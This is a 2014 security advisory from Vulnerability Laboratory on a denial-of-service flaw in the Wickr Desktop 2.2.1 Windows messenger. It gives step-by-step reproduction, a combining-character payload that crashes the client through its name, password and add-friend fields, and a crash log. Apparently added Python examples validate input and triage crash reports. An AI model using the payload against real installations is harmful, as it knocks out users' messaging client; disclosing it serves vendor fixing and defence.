Document Title:
===============
Wickr Desktop v2.2.1 Windows - Denial of Service Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1377

Video:
http://www.vulnerability-lab.com/get_content.php?id=1388


Release Date:
=============
2014-12-25


Vulnerability Laboratory ID (VL-ID):
====================================
1377


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
Wickr (pronounced `wicker`) is a proprietary instant messenger for iPhone and Android. Wickr allows users to exchange end-to-end encrypted and
self-destructing messages, including photos and file attachments. The `self-destruct` part of the software is designed to use a `Secure File Shredder`
which the company says `forensically erases unwanted files you deleted from your device`. However, the company uses a proprietary algorithm to manage
the data, a practice which is prone to error according to many security experts.

On January 15, 2014, Wickr announced it is offering a US$100,000 bug bounty for those who find vulnerabilities that significantly impact users. In addition,
a recipient can in general use other software and techniques like screen-capture capabilities or a separate camera to make permanent copies of the content.

(Copy of the Homepage: https://wickr.com/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a denial of service web vulnerability in the official Wickr Desktop v2.2.1 Windows software.


Vulnerability Disclosure Timeline:
==================================
2014-12-25: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Wickr Inc.
Product: Wickr - Desktop Software (Windows) 2.2.1


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium

Technical Details & Description:
================================
A local denial of service vulnerability has been discovered in the official Wickr TSM v2.2.1 (MSI) Windows software.
The issue allows local attackers to crash or shut down the software client by using specially crafted symbol payloads.

The Wickr v2.2.1 (MSI) software crashes with an unhandled exception in the CFLite.dll by the qsqlcipher_wickr.dll when it processes
specially crafted symbol strings as password or name. The issue occurs after the payload is entered into the `change name friend contacts`,
`the wickr password auth` and `friends > add friends` input fields. Attackers are able to change the name value of their own profile (payload)
to crash the Wickr client. Local attackers can include the payload in the input fields to crash or shut down the application with an unhandled exception.

The security risk of the denial of service vulnerability is estimated as medium with a CVSS (common vulnerability scoring system) count of 3.3.
Exploitation of the DoS vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of
the vulnerability results in an application crash or service shutdown.

Vulnerable Module(s):
[+] friend contacts
[+] wickr password auth
[+] friends

Vulnerable Input(s):
[+] add friends (name)
[+] wickr password auth
[+] change friend (update name)

Vulnerable Parameter(s):
[+] name (value input)
[+] password (value input)

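An input check for the name and password fields listed above, as an added example (not Wickr's code or its fix): it caps the field length and the number of consecutive combining marks, which is the shape of the payload printed in this advisory. The limits, the function name check_field and the sample strings are assumptions constructed for illustration; the advisory does not establish the root cause inside CFLite.dll.

```python
import unicodedata

MAX_LEN = 64       # assumed field limit, counted in code points after NFC
MAX_MARK_RUN = 3   # assumed cap on consecutive combining marks (categories Mn/Mc/Me)
REJECTED = {"Cc", "Cs", "Co", "Cn"}  # control, surrogate, private use, unassigned


def check_field(value: str) -> tuple[bool, str]:
    """Validate a name/password style field before it reaches storage code."""
    text = unicodedata.normalize("NFC", value)
    if not text:
        return False, "empty"
    if len(text) > MAX_LEN:
        return False, "too long"
    run = 0
    for ch in text:
        cat = unicodedata.category(ch)
        if cat in REJECTED:
            return False, f"disallowed code point U+{ord(ch):04X}"
        if cat.startswith("M"):
            run += 1
            if run > MAX_MARK_RUN:
                return False, "combining-mark run too long"
        else:
            run = 0
    return True, "ok"


# Constructed samples: two ordinary names, then one base letter followed by
# twenty copies of the Thai combining mark U+0E47.
SAMPLES = [
    "Ana\u0301",
    "\u0e2a\u0e27\u0e31\u0e2a\u0e14\u0e35",
    "\u0e2a" + "\u0e47" * 20,
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(ascii(s), check_field(s))
```
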
Proof of Concept (PoC):
=======================
The denial of service web vulnerability can be exploited by remote attackers and local attackers with low user interaction.
For security demonstration or to reproduce the vulnerability, follow the information and steps provided below.

Manual steps to reproduce the vulnerability ...
1. Download Wickr v2.2.1 for Windows to your Windows 8 box (mywickr.info/download.php?p=4)
2. Install the Windows version of the Wickr software on your Windows 8 box
3. Create a new account and include the payload in the password input field
Note: After the payload has been processed by the auth, the software crashes. You should attach a debugger beforehand.
4. Successful reproduction of the first issue!
5. Register a new account with regular values
6. Open the friends > add friends section and include the payload in the search input value
Note: After the payload has been processed to add the friend, the software crashes. You should attach a debugger beforehand.
7. Successful reproduction of the second issue!
8. Open the software again and log in. Switch to the existing friends contacts and edit the profile
9. Include the payload in the name values and save the settings
Note: After the payload has been processed to change the name, the software crashes. You should attach a debugger beforehand.
10. Successful reproduction of the third issue!

Payload: Denial of Service
็¬็ส็็็็็ -็็็็็็็็็็็็็็็็็็็็ส็¬็็็็็็็็¬็็็็็็็็็็็็็็็็ส็็็็¬็็็็็็็็็-็็็็็็็ ็็็็็ส็็็็็็็¬็็็็็็็็็็¬็็็็็็็็ส็็็็็็็็็็¬็็็็็็็็็็็ ¬็็็็ส็็็็็็็็็็็็็¬็็็็ ็็็็็็็็¬ส็็็็็็็็็็็็็็็็-็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็ ¬็็็็็็ส็็็็็็็¬ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็¬¬็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็¬็

--- Error Report Logs ---
EventType=APPCRASH
EventTime=130628671359850105
ReportType=2
Consent=1
UploadTime=130628671360390638
ReportIdentifier=df89d941-8208-11e4-be8b-54bef733d5e7
IntegratorReportIdentifier=df89d940-8208-11e4-be8b-54bef733d5e7
WOW64=1
NsAppName=Wickr.exe
Response.BucketId=96ac0935c87e28d0d5f61ef072fd75b8
Response.BucketTable=1
Response.LegacyBucketId=73726044048
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=Wickr.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=0.0.0.0
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=02849d78
Sig[3].Name=Fehlermodulname
Sig[3].Value=CFLite.dll
Sig[4].Name=Fehlermodulversion
Sig[4].Value=0.0.0.0
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=53f6c178
Sig[6].Name=Ausnahmecode
Sig[6].Value=c0000005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=00027966
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.3.9600.2.0.0.256.48
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusatzinformation 1
DynamicSig[22].Value=5861
DynamicSig[23].Name=Zusatzinformation 2
DynamicSig[23].Value=5861822e1919d7c014bbb064c64908b2
DynamicSig[24].Name=Zusatzinformation 3
DynamicSig[24].Value=84a0
DynamicSig[25].Name=Zusatzinformation 4
DynamicSig[25].Value=84a09ea102a12ee665c500221db8c9d6
UI[2]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
UI[3]=Wickr.exe funktioniert nicht mehr
UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
UI[5]=Online nach einer Lösung suchen und das Programm schließen
UI[6]=Später online nach einer Lösung suchen und das Programm schließen
UI[7]=Programm schließen
... ... ... ...
LoadedModule[103]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\sqldrivers\qsqlcipher_wickr.dll
State[0].Key=Transport.DoneStage1
State[0].Value=1
FriendlyEventName=Nicht mehr funktionsfähig
ConsentKey=APPCRASH
AppName=Wickr.exe
AppPath=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
NsPartner=windows
NsGroup=windows8
ApplicationIdentity=6A5425CE651532265F599A5A86C6C2EE

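A triage helper for Windows Error Reporting text like the report above, as an added example that is not part of the original advisory: it reads the APPCRASH signature by slot index, because the `.Name` labels are localized (German in this report), and flags an access violation in a watched module. The function names and the watch list are assumptions; the embedded lines are a subset copied from the report on this page.

```python
import re

# Subset of the error report printed in this advisory (values copied from the page).
REPORT = r"""EventType=APPCRASH
Sig[0].Name=Anwendungsname
Sig[0].Value=Wickr.exe
Sig[3].Name=Fehlermodulname
Sig[3].Value=CFLite.dll
Sig[6].Name=Ausnahmecode
Sig[6].Value=c0000005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=00027966
LoadedModule[103]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\sqldrivers\qsqlcipher_wickr.dll
"""

# APPCRASH signature slots are positional; the .Name labels follow the UI
# language, so key on the index and never on the label text.
APPCRASH_SLOTS = {0: "app", 3: "fault_module", 6: "exception_code", 7: "exception_offset"}
ACCESS_VIOLATION = 0xC0000005  # STATUS_ACCESS_VIOLATION
_SIG = re.compile(r"^Sig\[(\d+)\]\.Value=(.*)$")
_MOD = re.compile(r"^LoadedModule\[\d+\]=(.*)$")


def parse_wer(text):
    """Extract event type, positional signature values and loaded module names."""
    out = {"event_type": None, "loaded_modules": []}
    for line in map(str.strip, text.splitlines()):
        if line.startswith("EventType="):
            out["event_type"] = line.split("=", 1)[1]
        elif (m := _SIG.match(line)):
            slot = APPCRASH_SLOTS.get(int(m.group(1)))
            if slot:
                out[slot] = m.group(2)
        elif (m := _MOD.match(line)):
            out["loaded_modules"].append(m.group(1).rsplit("\\", 1)[-1].lower())
    return out


def triage(text, watch_modules=("cflite.dll",)):
    """Return a crash summary for APPCRASH reports, or None for other events."""
    r = parse_wer(text)
    if r["event_type"] != "APPCRASH":
        return None
    return {
        "app": r.get("app"),
        "fault_module": r.get("fault_module"),
        "offset": r.get("exception_offset"),
        "access_violation": int(r.get("exception_code", "0"), 16) == ACCESS_VIOLATION,
        "watched": r.get("fault_module", "").lower() in watch_modules,
        "sqlcipher_loaded": "qsqlcipher_wickr.dll" in r["loaded_modules"],
    }
```

A `Report.wer` file read from disk is UTF-16 encoded, so open it with `encoding="utf-16"` before passing its text to `triage()`.
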
Security Risk:
==============
The security risk of the denial of service web vulnerability in the Wickr Windows client software is estimated as medium. (CVSS 3.3)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
are trademarks of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get permission.

Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt